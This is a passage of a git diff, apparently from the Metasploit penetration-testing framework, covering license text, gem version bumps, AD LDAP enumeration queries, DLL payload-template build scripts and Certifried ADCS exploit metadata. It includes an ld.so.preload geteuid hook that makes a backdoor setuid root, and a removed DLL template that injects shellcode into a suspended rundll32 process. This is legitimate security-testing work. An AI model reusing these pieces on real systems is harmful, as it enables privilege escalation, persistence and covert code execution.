+PURPOSES OF SECTIONS 8 AND 9) AND ALL CONTRIBUTORS EXPRESSLY DISCLAIM
+ALL WARRANTIES AND/OR CONDITIONS, EXPRESS OR IMPLIED, INCLUDING, BUT
+NOT LIMITED TO, THE IMPLIED WARRANTIES AND/OR CONDITIONS OF
+MERCHANTABILITY, OF SATISFACTORY QUALITY, OF FITNESS FOR A PARTICULAR
+PURPOSE, OF ACCURACY, OF QUIET ENJOYMENT, AND NONINFRINGEMENT OF THIRD
+PARTY RIGHTS. APPLE AND EACH CONTRIBUTOR DOES NOT WARRANT AGAINST
+INTERFERENCE WITH YOUR ENJOYMENT OF THE COVERED CODE, THAT THE
+FUNCTIONS CONTAINED IN THE COVERED CODE WILL MEET YOUR REQUIREMENTS,
+THAT THE OPERATION OF THE COVERED CODE WILL BE UNINTERRUPTED OR
+ERROR-FREE, OR THAT DEFECTS IN THE COVERED CODE WILL BE CORRECTED. NO
+ORAL OR WRITTEN INFORMATION OR ADVICE GIVEN BY APPLE, AN APPLE
+AUTHORIZED REPRESENTATIVE OR ANY CONTRIBUTOR SHALL CREATE A WARRANTY.
+You acknowledge that the Covered Code is not intended for use in the
+operation of nuclear facilities, aircraft navigation, communication
+systems, or air traffic control machines in which case the failure of
+the Covered Code could lead to death, personal injury, or severe
+physical or environmental damage.
+
+9. LIMITATION OF LIABILITY. TO THE EXTENT NOT PROHIBITED BY LAW, IN NO
+EVENT SHALL APPLE OR ANY CONTRIBUTOR BE LIABLE FOR ANY INCIDENTAL,
+SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES ARISING OUT OF OR RELATING
+TO THIS LICENSE OR YOUR USE OR INABILITY TO USE THE COVERED CODE, OR
+ANY PORTION THEREOF, WHETHER UNDER A THEORY OF CONTRACT, WARRANTY,
+TORT (INCLUDING NEGLIGENCE), PRODUCTS LIABILITY OR OTHERWISE, EVEN IF
+APPLE OR SUCH CONTRIBUTOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
+DAMAGES AND NOTWITHSTANDING THE FAILURE OF ESSENTIAL PURPOSE OF ANY
+REMEDY. SOME JURISDICTIONS DO NOT ALLOW THE LIMITATION OF LIABILITY OF
+INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS LIMITATION MAY NOT APPLY
+TO YOU. In no event shall Apple's total liability to You for all
+damages (other than as may be required by applicable law) under this
+License exceed the amount of fifty dollars ($50.00).
+
+10. Trademarks. This License does not grant any rights to use the
+trademarks or trade names "Apple", "Apple Computer", "Mac", "Mac OS",
+"QuickTime", "QuickTime Streaming Server" or any other trademarks,
+service marks, logos or trade names belonging to Apple (collectively
+"Apple Marks") or to any trademark, service mark, logo or trade name
+belonging to any Contributor. You agree not to use any Apple Marks in
+or as part of the name of products derived from the Original Code or
+to endorse or promote products derived from the Original Code other
+than as expressly permitted by and in strict compliance at all times
+with Apple's third party trademark usage guidelines which are posted
+at http://www.apple.com/legal/guidelinesfor3rdparties.html.
+
+11. Ownership. Subject to the licenses granted under this License,
+each Contributor retains all rights, title and interest in and to any
+Modifications made by such Contributor. Apple retains all rights,
+title and interest in and to the Original Code and any Modifications
+made by or on behalf of Apple ("Apple Modifications"), and such Apple
+Modifications will not be automatically subject to this License. Apple
+may, at its sole discretion, choose to license such Apple
+Modifications under this License, or on different terms from those
+contained in this License or may choose not to license them at all.
+
+12. Termination.
+
+12.1 Termination. This License and the rights granted hereunder will
+terminate:
+
+(a) automatically without notice from Apple if You fail to comply with
+any term(s) of this License and fail to cure such breach within 30
+days of becoming aware of such breach;
+
+(b) immediately in the event of the circumstances described in Section
+13.5(b); or
+
+(c) automatically without notice from Apple if You, at any time during
+the term of this License, commence an action for patent infringement
+against Apple; provided that Apple did not first commence
+an action for patent infringement against You in that instance.
+
+12.2 Effect of Termination. Upon termination, You agree to immediately
+stop any further use, reproduction, modification, sublicensing and
+distribution of the Covered Code. All sublicenses to the Covered Code
+which have been properly granted prior to termination shall survive
+any termination of this License. Provisions which, by their nature,
+should remain in effect beyond the termination of this License shall
+survive, including but not limited to Sections 3, 5, 8, 9, 10, 11,
+12.2 and 13. No party will be liable to any other for compensation,
+indemnity or damages of any sort solely as a result of terminating
+this License in accordance with its terms, and termination of this
+License will be without prejudice to any other right or remedy of
+any party.
+
+13. Miscellaneous.
+
+13.1 Government End Users. The Covered Code is a "commercial item" as
+defined in FAR 2.101. Government software and technical data rights in
+the Covered Code include only those rights customarily provided to the
+public as defined in this License. This customary commercial license
+in technical data and software is provided in accordance with FAR
+12.211 (Technical Data) and 12.212 (Computer Software) and, for
+Department of Defense purchases, DFAR 252.227-7015 (Technical Data --
+Commercial Items) and 227.7202-3 (Rights in Commercial Computer
+Software or Computer Software Documentation). Accordingly, all U.S.
+Government End Users acquire Covered Code with only those rights set
+forth herein.
+
+13.2 Relationship of Parties. This License will not be construed as
+creating an agency, partnership, joint venture or any other form of
+legal association between or among You, Apple or any Contributor, and
+You will not represent to the contrary, whether expressly, by
+implication, appearance or otherwise.
+
+13.3 Independent Development. Nothing in this License will impair
+Apple's right to acquire, license, develop, have others develop for
+it, market and/or distribute technology or products that perform the
+same or similar functions as, or otherwise compete with,
+Modifications, Larger Works, technology or products that You may
+develop, produce, market or distribute.
+
+13.4 Waiver; Construction. Failure by Apple or any Contributor to
+enforce any provision of this License will not be deemed a waiver of
+future enforcement of that or any other provision. Any law or
+regulation which provides that the language of a contract shall be
+construed against the drafter will not apply to this License.
+
+13.5 Severability. (a) If for any reason a court of competent
+jurisdiction finds any provision of this License, or portion thereof,
+to be unenforceable, that provision of the License will be enforced to
+the maximum extent permissible so as to effect the economic benefits
+and intent of the parties, and the remainder of this License will
+continue in full force and effect. (b) Notwithstanding the foregoing,
+if applicable law prohibits or restricts You from fully and/or
+specifically complying with Sections 2 and/or 3 or prevents the
+enforceability of either of those Sections, this License will
+immediately terminate and You must immediately discontinue any use of
+the Covered Code and destroy all copies of it that are in your
+possession or control.
+
+13.6 Dispute Resolution. Any litigation or other dispute resolution
+between You and Apple relating to this License shall take place in the
+Northern District of California, and You and Apple hereby consent to
+the personal jurisdiction of, and venue in, the state and federal
+courts within that District with respect to this License. The
+application of the United Nations Convention on Contracts for the
+International Sale of Goods is expressly excluded.
+
+13.7 Entire Agreement; Governing Law. This License constitutes the
+entire agreement between the parties with respect to the subject
+matter hereof. This License shall be governed by the laws of the
+United States and the State of California, except that body of
+California law concerning conflicts of law.
+
+Where You are located in the province of Quebec, Canada, the following
+clause applies: The parties hereby confirm that they have requested
+that this License and all related documents be drafted in English. Les
+parties ont exige que le present contrat et tous les documents
+connexes soient rediges en anglais.
+
+EXHIBIT A.
+
+"Portions Copyright (c) 1999-2003 Apple Computer, Inc. All Rights
+Reserved.
+
+This file contains Original Code and/or Modifications of Original Code
+as defined in and that are subject to the Apple Public Source License
+Version 2.0 (the 'License'). You may not use this file except in
+compliance with the License. Please obtain a copy of the License at
+http://www.opensource.apple.com/apsl/ and read it before using this
+file.
+
+The Original Code and all software distributed under the License are
+distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+Please see the License for the specific language governing rights and
+limitations under the License."
@@ -1,31 +1,31 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 1.1.0, MIT
-actionpack, 6.1.7, MIT
-actionview, 6.1.7, MIT
-activemodel, 6.1.7, MIT
-activerecord, 6.1.7, MIT
-activesupport, 6.1.7, MIT
+actionpack, 7.0.4.2, MIT
+actionview, 7.0.4.2, MIT
+activemodel, 7.0.4.2, MIT
+activerecord, 7.0.4.2, MIT
+activesupport, 7.0.4.2, MIT
 addressable, 2.8.1, "Apache 2.0"
 afm, 0.2.2, MIT
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
 aws-eventstream, 1.2.0, "Apache 2.0"
-aws-partitions, 1.689.0, "Apache 2.0"
-aws-sdk-core, 3.168.4, "Apache 2.0"
-aws-sdk-ec2, 1.356.0, "Apache 2.0"
-aws-sdk-iam, 1.73.0, "Apache 2.0"
-aws-sdk-kms, 1.61.0, "Apache 2.0"
-aws-sdk-s3, 1.117.2, "Apache 2.0"
+aws-partitions, 1.707.0, "Apache 2.0"
+aws-sdk-core, 3.170.0, "Apache 2.0"
+aws-sdk-ec2, 1.364.0, "Apache 2.0"
+aws-sdk-iam, 1.75.0, "Apache 2.0"
+aws-sdk-kms, 1.62.0, "Apache 2.0"
+aws-sdk-s3, 1.119.0, "Apache 2.0"
 aws-sigv4, 1.5.2, "Apache 2.0"
 bcrypt, 3.1.18, MIT
 bcrypt_pbkdf, 1.1.0, MIT
-bindata, 2.4.14, ruby
+bindata, 2.4.15, "Simplified BSD"
 bson, 4.15.0, "Apache 2.0"
 builder, 3.2.4, MIT
 bundler, 2.1.4, MIT
 byebug, 11.1.3, "Simplified BSD"
 coderay, 1.1.3, MIT
-concurrent-ruby, 1.1.10, MIT
+concurrent-ruby, 1.2.0, MIT
 cookiejar, 0.3.3, unknown
 crass, 1.0.6, MIT
 daemons, 1.4.1, MIT
@@ -41,8 +41,8 @@ erubi, 1.12.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 6.2.1, MIT
 factory_bot_rails, 6.2.0, MIT
-faker, 3.1.0, MIT
-faraday, 2.7.2, MIT
+faker, 3.1.1, MIT
+faraday, 2.7.4, MIT
 faraday-net_http, 3.0.2, MIT
 faraday-retry, 2.0.0, MIT
 faye-websocket, 0.11.1, "Apache 2.0"
@@ -68,12 +68,12 @@ logging, 2.3.1, MIT
 loofah, 2.19.1, MIT
 memory_profiler, 1.0.1, MIT
 metasm, 1.0.5, LGPL-2.1
-metasploit-concern, 4.0.5, "New BSD"
-metasploit-credential, 6.0.1, "New BSD"
-metasploit-framework, 6.2.36, "New BSD"
-metasploit-model, 4.0.6, "New BSD"
-metasploit-payloads, 2.0.105, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 5.0.6, "New BSD"
+metasploit-concern, 5.0.1, "New BSD"
+metasploit-credential, 6.0.2, "New BSD"
+metasploit-framework, 6.3.3, "New BSD"
+metasploit-model, 5.0.1, "New BSD"
+metasploit-payloads, 2.0.108, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 6.0.2, "New BSD"
 metasploit_payloads-mettle, 1.0.20, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
 mini_portile2, 2.8.1, MIT
@@ -90,7 +90,7 @@ net-ssh, 7.0.1, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.5.8, MIT
-nokogiri, 1.13.10, MIT
+nokogiri, 1.14.1, MIT
 nori, 2.6.0, MIT
 octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
@@ -108,54 +108,55 @@ pry-byebug, 3.10.1, MIT
 public_suffix, 5.0.1, MIT
 puma, 6.0.2, "New BSD"
 racc, 1.6.2, "ruby, Simplified BSD"
-rack, 2.2.5, MIT
+rack, 2.2.6.2, MIT
 rack-protection, 3.0.5, MIT
 rack-test, 2.0.2, MIT
 rails-dom-testing, 2.0.3, MIT
-rails-html-sanitizer, 1.4.4, MIT
-railties, 6.1.7, MIT
+rails-html-sanitizer, 1.5.0, MIT
+railties, 7.0.4.2, MIT
 rainbow, 3.1.1, MIT
 rake, 13.0.6, MIT
+rasn1, 0.12.1, MIT
 rb-readline, 0.5.5, BSD
 recog, 3.0.3, unknown
-redcarpet, 3.5.1, MIT
-regexp_parser, 2.6.1, MIT
+redcarpet, 3.6.0, MIT
+regexp_parser, 2.6.2, MIT
 reline, 0.3.2, ruby
 rex-arch, 0.1.14, "New BSD"
 rex-bin_tools, 0.1.8, "New BSD"
-rex-core, 0.1.28, "New BSD"
+rex-core, 0.1.30, "New BSD"
 rex-encoder, 0.1.6, "New BSD"
-rex-exploitation, 0.1.36, "New BSD"
+rex-exploitation, 0.1.37, "New BSD"
 rex-java, 0.1.6, "New BSD"
 rex-mime, 0.1.7, "New BSD"
 rex-nop, 0.1.2, "New BSD"
 rex-ole, 0.1.7, "New BSD"
 rex-powershell, 0.1.97, "New BSD"
-rex-random_identifier, 0.1.9, "New BSD"
+rex-random_identifier, 0.1.10, "New BSD"
 rex-registry, 0.1.4, "New BSD"
 rex-rop_builder, 0.1.4, "New BSD"
-rex-socket, 0.1.43, "New BSD"
-rex-sslscan, 0.1.8, "New BSD"
+rex-socket, 0.1.47, "New BSD"
+rex-sslscan, 0.1.9, "New BSD"
 rex-struct2, 0.1.3, "New BSD"
-rex-text, 0.2.47, "New BSD"
+rex-text, 0.2.49, "New BSD"
 rex-zip, 0.1.4, "New BSD"
 rexml, 3.2.5, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.12.0, MIT
-rspec-core, 3.12.0, MIT
+rspec-core, 3.12.1, MIT
 rspec-expectations, 3.12.2, MIT
-rspec-mocks, 3.12.2, MIT
+rspec-mocks, 3.12.3, MIT
 rspec-rails, 6.0.1, MIT
 rspec-rerun, 1.1.0, MIT
 rspec-support, 3.12.0, MIT
-rubocop, 1.42.0, MIT
+rubocop, 1.44.1, MIT
 rubocop-ast, 1.24.1, MIT
 ruby-macho, 3.0.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.11.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.2.1, "New BSD"
+ruby_smb, 3.2.4, "New BSD"
 rubyntlm, 0.6.3, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.9.2, MIT
@@ -163,8 +164,9 @@ simplecov, 0.18.2, MIT
 simplecov-html, 0.12.3, MIT
 simpleidn, 0.2.1, MIT
 sinatra, 3.0.5, MIT
-sqlite3, 1.5.4, "New BSD"
+sqlite3, 1.6.0, "New BSD"
 sshkey, 2.0.0, MIT
+strptime, 0.2.5, "Simplified BSD"
 swagger-blocks, 3.0.0, MIT
 thin, 1.8.1, "GPL-2.0+, ruby"
 thor, 1.2.1, MIT
@@ -172,7 +174,7 @@ tilt, 2.0.11, MIT
 timecop, 0.9.6, MIT
 timeout, 0.3.1, "ruby, Simplified BSD"
 ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
-tzinfo, 2.0.5, MIT
+tzinfo, 2.0.6, MIT
 tzinfo-data, 1.2022.7, MIT
 unf, 0.1.4, "2-clause BSDL"
 unf_ext, 0.0.8.2, MIT
@@ -183,7 +185,7 @@ webrick, 1.7.0, "ruby, Simplified BSD"
 websocket-driver, 0.7.5, "Apache 2.0"
 websocket-extensions, 0.1.5, "Apache 2.0"
 win32api, 0.1.0, unknown
-windows_error, 0.1.4, BSD
+windows_error, 0.1.5, BSD
 winrm, 2.3.6, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.2, "ruby, Simplified BSD"
@@ -49,6 +49,10 @@ module Metasploit
      when "production"
        config.eager_load = true
      end
+
+      if ActiveRecord.respond_to?(:legacy_connection_handling=)
+        ActiveRecord.legacy_connection_handling = false
+      end
    end
  end
 end
@@ -9,6 +9,7 @@ queries:
      - description
      - displayName
      - sAMAccountName
+      - objectSID
      - userPrincipalName
      - userAccountControl
      - homeDirectory
@@ -92,12 +93,14 @@ queries:
    filter: '(|(objectCategory=computer)(objectClass=computer))'
    attributes:
      - dn
+      - name
+      - description
      - displayName
+      - sAMAccountName
+      - objectSID
      - distinguishedName
      - dNSHostName
-      - description
      - givenName
-      - name
      - operatingSystem
      - operatingSystemVersion
      - operatingSystemServicePack
@@ -140,6 +143,18 @@ queries:
      - distinguishedName
    references:
      - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
+  - action: ENUM_DOMAIN
+    description: 'Dump info about the Active Directory domain.'
+    filter: '(objectClass=domain)'
+    attributes:
+      - ms-DS-MachineAccountQuota
+      - objectSID
+      - name
+      - lockoutduration
+      - lockoutthreshold
+      - minpwdage
+      - maxpwdage
+      - minpwdlength
  - action: ENUM_DOMAIN_CONTROLLERS
    description: 'Dump all known domain controllers.'
    filter: '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))'
@@ -253,6 +268,13 @@ queries:
      - dnsHostName
    references:
      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
+  - action: ENUM_MACHINE_ACCOUNT_QUOTA
+    description: 'Dump the number of computer accounts a user is allowed to create in a domain.'
+    filter: '(objectClass=domain)'
+    attributes:
+      - ms-DS-MachineAccountQuota
+    references:
+      - https://learn.microsoft.com/en-us/windows/win32/adschema/a-ms-ds-machineaccountquota
  - action: ENUM_ORGROLES
    description: 'Dump info about all known organization roles in the LDAP environment.'
    filter: '(objectClass=organizationalRole)'
@@ -0,0 +1,15 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <sys/stat.h>
+#include <unistd.h>
+#include <dlfcn.h>
+uid_t geteuid(void) {
+	static uid_t  (*old_geteuid)();
+	old_geteuid = dlsym(RTLD_NEXT, "geteuid");
+	if ( old_geteuid() == 0 ) {
+		chown("$BACKDOORPATH", 0, 0);
+		chmod("$BACKDOORPATH", 04777);
+		unlink("/etc/ld.so.preload");
+	}
+	return old_geteuid();
+}
@@ -15,7 +15,7 @@
 <% end %>

 ## Module Ranking
-<%# https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking %>
+<%# https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html %>

 **<%= items[:mod_rank_name] %>**

@@ -47,7 +47,7 @@
 <% end %>

 ## Module Traits
-<%# https://github.com/rapid7/metasploit-framework/wiki/Definition-of-Module-Reliability,-Side-Effects,-and-Stability %>
+<%# https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html %>

 <% unless items[:mod_side_effects].empty? %>
 ### Side Effects
@@ -5,4 +5,4 @@ msf <%= mod.type %>(<%= mod.shortname %>) > show options
 msf <%= mod.type %>(<%= mod.shortname %>) > generate
 ```

-To learn how to generate <%= mod.fullname %> with msfvenom, please [read this](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom).
+To learn how to generate <%= mod.fullname %> with msfvenom, please [read this](https://docs.metasploit.com/docs/using-metasploit/basics/how-to-use-msfvenom.html).
@@ -0,0 +1,10 @@
+# PE Source Code
+This directory contains the source code for the PE executable templates.
+
+## Building DLLs
+Use the provided `build_dlls.bat` file, and run it from within the Visual Studio
+developer console. The batch file requires that the `%VCINSTALLDIR%` environment
+variable be defined (which it should be by default). The build script will
+create both the x86 and x64 templates before moving them into the correct
+folder. The current working directory when the build is run must be the source
+code directory (`pe`).
@@ -0,0 +1,7 @@
+@echo off
+
+for /D %%d in (dll*) do (
+  pushd "%%d"
+  build.bat
+  popd
+)
@@ -3,12 +3,13 @@
 if "%~1"=="" GOTO NO_ARGUMENTS
 echo Compiling for: %1
 call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
-cl /LD /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows.dll /link kernel32.lib /entry:DllMain /subsystem:WINDOWS
+rc /v template.rc
+cl /LD /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
+cl /LD /GS- /DBUILDMODE=2 /DSCSIZE=262144 template.c /Fe:template_%1_windows.256kib.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
 exit /B

 :NO_ARGUMENTS
 %COMSPEC% /c "%0" x86
 %COMSPEC% /c "%0" x64
-del  *.obj
+del  *.obj *.res
 move *.dll ..\..\..
-
@@ -1,5 +1,6 @@
-
+#ifndef SCSIZE
 #define SCSIZE 4096
+#endif
 unsigned char code[SCSIZE] = "PAYLOAD:";
 char szSyncNameS[MAX_PATH] = "Local\\Semaphore:Default\0";
 char szSyncNameE[MAX_PATH] = "Local\\Event:Default\0";
@@ -0,0 +1,15 @@
+@echo off
+
+if "%~1"=="" GOTO NO_ARGUMENTS
+echo Compiling for: %1
+call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+rc /v /fo template.res ../dll/template.rc
+cl /LD /GS- /DBUILDMODE=2 /I . /FI exports.h ../dll/template.c /Fe:template_%1_windows_dccw_gdiplus.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
+cl /LD /GS- /DBUILDMODE=2 /DSCSIZE=262144 /I . /FI exports.h ../dll/template.c /Fe:template_%1_windows_dccw_gdiplus.256kib.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
+exit /B
+
+:NO_ARGUMENTS
+%COMSPEC% /c "%0" x86
+%COMSPEC% /c "%0" x64
+del  *.exp *.lib *.res *.obj
+move *.dll ..\..\..
@@ -1,24 +0,0 @@
-#
-# XXX: NOTE: this will only compile the x86 version.
-#
-# To compile the x64 version, use:
-# C:\> call "c:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\vcvarsall.bat" amd64
-# C:\> cl.exe -LD /Zl /GS- /DBUILDMODE=2 /link /entry:DllMain kernel32.lib
-#
-
-if [ -z "$PREFIX" ]; then
-  PREFIX=i686-w64-mingw32 
-fi
-
-rm -f *.o *.dll
-$PREFIX-gcc -c template.c
-$PREFIX-windres -o rc.o template.rc
-$PREFIX-gcc -mdll -o junk.tmp -Wl,--base-file,base.tmp template.o rc.o
-rm -f junk.tmp
-$PREFIX-dlltool --dllname template_x86_windows.dll --base-file base.tmp --output-exp temp.exp #--def template.def
-rm -f base.tmp
-$PREFIX-gcc -mdll -o template_x86_windows.dll template.o rc.o -Wl,temp.exp
-rm -f temp.exp
-
-$PREFIX-strip template_x86_windows.dll
-rm -f *.o
@@ -1,6 +1,3 @@
-#define SCSIZE 2048
-unsigned char code[SCSIZE] = "PAYLOAD:";
-
 #ifdef _MSC_VER
 	#pragma comment (linker, "/export:GdipAlloc=c:/windows/system32/gdiplus.GdipAlloc,@34")
 	#pragma comment (linker, "/export:GdipCloneBrush=c:/windows/system32/gdiplus.GdipCloneBrush,@46")
@@ -1,97 +0,0 @@
-#include <windows.h>
-#include "template.h"
-
-/* hand-rolled bzero allows us to avoid including ms vc runtime */
-void inline_bzero(void *p, size_t l)
-{
-
-           BYTE *q = (BYTE *)p;
-           size_t x = 0;
-           for (x = 0; x < l; x++)
-                     *(q++) = 0x00;
-}
-
-void ExecutePayload(void);
-
-BOOL WINAPI
-DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
-{
-    switch (dwReason)
-    {
-        case DLL_PROCESS_ATTACH:
-			ExecutePayload();
-            break;
-
-        case DLL_PROCESS_DETACH:
-            // Code to run when the DLL is freed
-            break;
-
-        case DLL_THREAD_ATTACH:
-            // Code to run when a thread is created during the DLL's lifetime
-            break;
-
-        case DLL_THREAD_DETACH:
-            // Code to run when a thread ends normally.
-            break;
-    }
-    return TRUE;
-}
-
-void ExecutePayload(void) {
-    int error;
-	PROCESS_INFORMATION pi;
-	STARTUPINFO si;
-	CONTEXT ctx;
-	DWORD prot;
-   LPVOID ep;
-
-	// Start up the payload in a new process
-	inline_bzero( &si, sizeof( si ));
-	si.cb = sizeof(si);
-
-	// Create a suspended process, write shellcode into stack, make stack RWX, resume it
-	if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {
-		ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
-		GetThreadContext(pi.hThread, &ctx);
-
-	   ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-
-        WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
-
-#ifdef _WIN64
-	   ctx.Rip = (DWORD64)ep;
-#else
-	   ctx.Eip = (DWORD)ep;
-#endif
-
-        SetThreadContext(pi.hThread,&ctx);
-
-        ResumeThread(pi.hThread);
-        CloseHandle(pi.hThread);
-        CloseHandle(pi.hProcess);
-	}
-   // ExitProcess(0);
-   ExitThread(0);
-}
-
-/*
-typedef VOID
-(NTAPI *PIMAGE_TLS_CALLBACK) (
-    PVOID DllHandle,
-    ULONG Reason,
-    PVOID Reserved
-    );
-
-VOID NTAPI TlsCallback(
-      IN PVOID DllHandle,
-      IN ULONG Reason,
-      IN PVOID Reserved)
-{
-	__asm  ( "int3" );
-}
-
-ULONG _tls_index;
-PIMAGE_TLS_CALLBACK _tls_cb[] = { TlsCallback, NULL };
-IMAGE_TLS_DIRECTORY _tls_used = { 0, 0, (ULONG)&_tls_index, (ULONG)_tls_cb, 1000, 0 };
-*/
-
@@ -1,3 +0,0 @@
-EXPORTS
-DllMain@12
-
@@ -1,18 +0,0 @@
-
-LANGUAGE 9, 1
-
-
-VS_VERSION_INFO VERSIONINFO
- FILEVERSION 0,0,0,1
- PRODUCTVERSION 0,0,0,1
- FILEFLAGSMASK 0x17L
- FILEFLAGS 0x0L
- FILEOS 0x4L
- FILETYPE 0x2L
- FILESUBTYPE 0x0L
-BEGIN
-
-END
-
-#define RT_HTML  23
-
@@ -4,6 +4,7 @@ if "%~1"=="" GOTO NO_ARGUMENTS
 echo Compiling for: %1
 call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
 cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 template.cpp /Fe:template_%1_windows_mixed_mode.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
+cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 /DSCSIZE=262144 template.cpp /Fe:template_%1_windows_mixed_mode.256kib.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
 exit /B

 :NO_ARGUMENTS
@@ -595,9 +595,9 @@
    "session_types": false,
    "needs_cleanup": false
  },
-  "auxiliary_admin/dcerpc/icpr_cert": {
-    "name": "ICPR Certificate Management",
-    "fullname": "auxiliary/admin/dcerpc/icpr_cert",
+  "auxiliary_admin/dcerpc/cve_2022_26923_certifried": {
+    "name": "Active Directory Certificate Services (ADCS) privilege escalation (Certifried)",
+    "fullname": "auxiliary/admin/dcerpc/cve_2022_26923_certifried",
    "aliases": [

    ],
@@ -606,11 +606,15 @@
    "type": "auxiliary",
    "author": [
      "Oliver Lyak",
-      "Spencer McIntyre"
+      "CravateRouge",
+      "Erik Wynter",
+      "Christophe De La Fuente"
    ],
-    "description": "Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate\n          template's configuration the resulting certificate can be used for various operations such as authentication.\n          PFX certificate files that are saved are encrypted with a blank password.",
+    "description": "This module exploits a privilege escalation vulnerability in Active\n          Directory Certificate Services (ADCS) to generate a valid certificate\n          impersonating the Domain Controller (DC) computer account. This\n          certificate is then used to authenticate to the target as the DC\n          account using PKINIT preauthentication mechanism. The module will get\n          and cache the Ticket-Granting-Ticket (TGT) for this account along\n          with its NTLM hash. Finally, it requests a TGS impersonating a\n          privileged user (Administrator by default). This TGS can then be used\n          by other modules or external tools.",
    "references": [
-
+      "URL-https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4",
+      "URL-https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html",
+      "CVE-2022-26923"
    ],
    "platform": "",
    "arch": "",
@@ -624,7 +628,63 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2022-08-25 08:49:52 +0000",
+    "mod_time": "2023-01-24 14:30:39 +0000",
+    "path": "/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb",
+    "is_install_path": true,
+    "ref_name": "admin/dcerpc/cve_2022_26923_certifried",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "Certifried"
+      ],
+      "Reliability": [
+        "crash-safe"
+      ],
+      "Stability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "auxiliary_admin/dcerpc/icpr_cert": {
+    "name": "ICPR Certificate Management",
+    "fullname": "auxiliary/admin/dcerpc/icpr_cert",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Will Schroeder",
+      "Lee Christensen",
+      "Oliver Lyak",
+      "Spencer McIntyre"
+    ],
+    "description": "Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate\n          template's configuration the resulting certificate can be used for various operations such as authentication.\n          PFX certificate files that are saved are encrypted with a blank password.",
+    "references": [
+      "URL-https://github.com/GhostPack/Certify",
+      "URL-https://github.com/ly4k/Certipy"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 445,
+    "autofilter_ports": [
+      139,
+      445
+    ],
+    "autofilter_services": [
+      "netbios-ssn",
+      "microsoft-ds"
+    ],
+    "targets": null,
+    "mod_time": "2022-12-02 16:29:02 +0000",
    "path": "/modules/auxiliary/admin/dcerpc/icpr_cert.rb",
    "is_install_path": true,
    "ref_name": "admin/dcerpc/icpr_cert",
@@ -640,6 +700,10 @@
      ],
      "SideEffects": [
        "ioc-in-logs"
+      ],
+      "AKA": [
+        "Certifry",
+        "Certipy"
      ]
    },
    "session_types": false,
@@ -674,7 +738,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2022-10-21 13:40:38 +0000",
